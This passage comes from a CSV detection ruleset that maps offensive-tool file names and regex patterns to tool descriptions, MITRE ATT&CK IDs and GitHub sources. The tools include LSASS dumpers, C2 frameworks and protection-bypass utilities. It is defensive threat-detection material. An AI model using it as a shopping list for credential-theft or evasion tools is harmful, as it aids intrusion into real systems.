T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*/powerfun.ps1*",".{0,1000}\/powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/powerglot/*",".{0,1000}\/powerglot\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/powerkatz.dll*",".{0,1000}\/powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/powerkatz_x64.dll*",".{0,1000}\/powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red 
teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/powerkatz_x86.dll*",".{0,1000}\/powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*/powerloader.py*",".{0,1000}\/powerloader\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Powermad.git*",".{0,1000}\/Powermad\.git.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*/Powermad.ps1*",".{0,1000}\/Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*/power-pwn.git*",".{0,1000}\/power\-pwn\.git.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*/PowerSCCM.git*",".{0,1000}\/PowerSCCM\.git.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to 
interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*/PowerSharpPack.git*",".{0,1000}\/PowerSharpPack\.git.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*/powershell/process_injection/*",".{0,1000}\/powershell\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/powershell_executor/*.go*",".{0,1000}\/powershell_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/PowershellKerberos.git*",".{0,1000}\/PowershellKerberos\.git.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*/PowershellTools.git*",".{0,1000}\/PowershellTools\.git.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools 
used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*/PowerShx.git*",".{0,1000}\/PowerShx\.git.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*/PowerTools.ps1*",".{0,1000}\/PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*/PowerUp.ps1*",".{0,1000}\/PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/PowerView.cna*",".{0,1000}\/PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/powerview.ps1*",".{0,1000}\/powerview\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/PowerView.ps1*",".{0,1000}\/PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*/PowerView3.cna*",".{0,1000}\/PowerView3\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*/PPEnum/*",".{0,1000}\/PPEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*/ppid_spoofing.exe*",".{0,1000}\/ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ppl/ppl.c*",".{0,1000}\/ppl\/ppl\.c.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/ppl_dump.*",".{0,1000}\/ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/PPLBlade.git*",".{0,1000}\/PPLBlade\.git.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/ppldump.*",".{0,1000}\/ppldump\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*/PPLDump_BOF/*",".{0,1000}\/PPLDump_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*/PPLFault/*",".{0,1000}\/PPLFault\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - 
TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*/PPLKiller.git*",".{0,1000}\/PPLKiller\.git.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*/PPLKiller/*",".{0,1000}\/PPLKiller\/.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*/PPLmedic.exe*",".{0,1000}\/PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*/PPLmedic.git*",".{0,1000}\/PPLmedic\.git.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*/pptp-version.nse*",".{0,1000}\/pptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prefetch-tool.git*",".{0,1000}\/prefetch\-tool\.git.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*/prepare.sh shell/mod_*.htaccess*",".{0,1000}\/prepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*/PrimusC2*",".{0,1000}\/PrimusC2.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*/PrimusC2.git*",".{0,1000}\/PrimusC2\.git.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat 
sheets","8","10","N/A","N/A","N/A","N/A" "*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*/printernightmare.ps1*",".{0,1000}\/printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/PrintMonitorDll.*",".{0,1000}\/PrintMonitorDll\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" 
"*/PrintMonitorDll/*",".{0,1000}\/PrintMonitorDll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*/printnightmare.py*",".{0,1000}\/printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - 
T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*/PrintSpoofer.git*",".{0,1000}\/PrintSpoofer\.git.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*/PrintSpoofer/*",".{0,1000}\/PrintSpoofer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*/Priv_Esc.sh*",".{0,1000}\/Priv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/Privesc.git*",".{0,1000}\/Privesc\.git.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege 